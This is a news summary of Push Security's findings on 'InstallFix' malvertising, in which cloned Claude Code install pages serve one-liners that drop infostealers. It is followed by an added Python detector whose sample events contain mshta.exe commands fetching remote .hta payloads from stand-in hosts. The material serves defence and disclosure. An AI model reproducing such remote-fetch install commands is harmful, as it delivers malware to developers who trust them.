Particle.news

Researchers Expose 'InstallFix' Malvertising Cloning Claude Code Install Pages to Deliver Infostealers

Push Security reports that sponsored search results funnel developers to near‑pixel‑perfect pages whose one‑line installers retrieve malware from attacker‑controlled servers.

Overview

  • Attackers pay for Google Ads on queries such as “Claude Code install” and “Claude Code CLI,” directing users to lookalike domains that mimic Anthropic’s documentation.
  • On Windows, the rogue command triggers cmd.exe to launch mshta.exe and pull remote code that installs the Amatera Stealer, while macOS commands likely fetch a similar infostealer.
  • Push Security observed identical binaries executed across multiple sites, indicating a single coordinated campaign rather than isolated copycats.
  • The operation leverages trusted infrastructure by hosting content on Cloudflare Pages, Squarespace, and Tencent EdgeOne, and by planting commands or packages on claude.ai pages, GitHub, Homebrew clones, and NPM.
  • Researchers label the tactic an InstallFix variant of ClickFix that capitalizes on copy‑pasted one‑liner installs and sidesteps email‑based defenses through malvertising.
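As an added defensive example (not code from Push Security or this article), a small Python detector for the Windows chain described above: a shell spawning mshta.exe with a remote URL on its command line. It assumes constructed process-creation events shaped as (parent image, image, command line) with example.invalid hosts, and, as a generalization beyond the page, also treats PowerShell as a suspicious parent.

```python
"""Detection sketch for the cmd.exe -> mshta.exe -> remote payload chain."""
import re
from urllib.parse import urlparse

# Constructed sample Windows process-creation events (not real telemetry):
# (parent_image, image, command_line).
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\cmd.exe", "C:\\Windows\\System32\\mshta.exe",
     "mshta https://installer.example.invalid/claude/setup.hta"),
    ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\mshta.exe",
     "mshta.exe C:\\Tools\\local_dashboard.hta"),
    ("C:\\Windows\\System32\\cmd.exe", "C:\\Program Files\\nodejs\\npm.cmd",
     "npm install -g @anthropic-ai/claude-code"),
    ("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "C:\\Windows\\System32\\mshta.exe",
     "mshta.exe https://cdn.example.invalid/update.hta"),
]

REMOTE_URL = re.compile(r"\b(?:https?|ftp)://[^\s\"'<>]+", re.IGNORECASE)
# cmd.exe is the parent named in the report; PowerShell is an added assumption.
SHELL_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def basename(path):
    """Return the file name from a Windows or POSIX path, lower-cased."""
    return re.split(r"[\\/]", path)[-1].lower()


def classify_event(parent_image, image, command_line):
    """Return the remote host mshta.exe was pointed at, or None when the event
    does not match the shell -> mshta.exe -> remote URL pattern."""
    if basename(image) != "mshta.exe" or basename(parent_image) not in SHELL_PARENTS:
        return None
    match = REMOTE_URL.search(command_line)
    if not match:
        return None  # local .hta or inline script: outside this rule's scope
    return urlparse(match.group(0)).hostname


def find_installfix_chains(events):
    """Return (event_index, remote_host) for every matching event."""
    hits = []
    for i, (parent, image, cmdline) in enumerate(events):
        host = classify_event(parent, image, cmdline)
        if host:
            hits.append((i, host))
    return hits


if __name__ == "__main__":
    for idx, host in find_installfix_chains(SAMPLE_EVENTS):
        print(f"event {idx}: shell-spawned mshta.exe fetching from {host}")
```

The returned host is what a responder would pivot on when checking whether other endpoints reached the same attacker-controlled server.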